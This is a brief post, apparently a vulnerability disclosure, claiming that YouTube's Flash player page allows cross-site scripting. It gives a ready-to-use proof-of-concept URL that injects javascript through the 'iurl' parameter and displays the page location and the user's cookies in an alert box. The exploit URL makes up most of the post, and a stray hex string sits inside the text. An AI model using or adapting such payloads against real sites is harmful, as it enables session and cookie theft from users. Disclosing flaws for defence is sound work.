YouTube.com has a flaw that allows for arbitrary javascript execution.
e480100c0925d0a0fc57c028bdc12441The following URL will cause javascript to execute in the context of youtube
http://www.youtube.com/p.swf?video_id=eVFF98kNg8Q&eurl=&t=&iurl=javascript:alert('Javascript%20executed!\r\n\r\nLocation:
'%2bwindow.location%2b'\r\n\r\nCookie: '%2bdocument.cookie)
Cheers
Comments
No comments yet, be the first!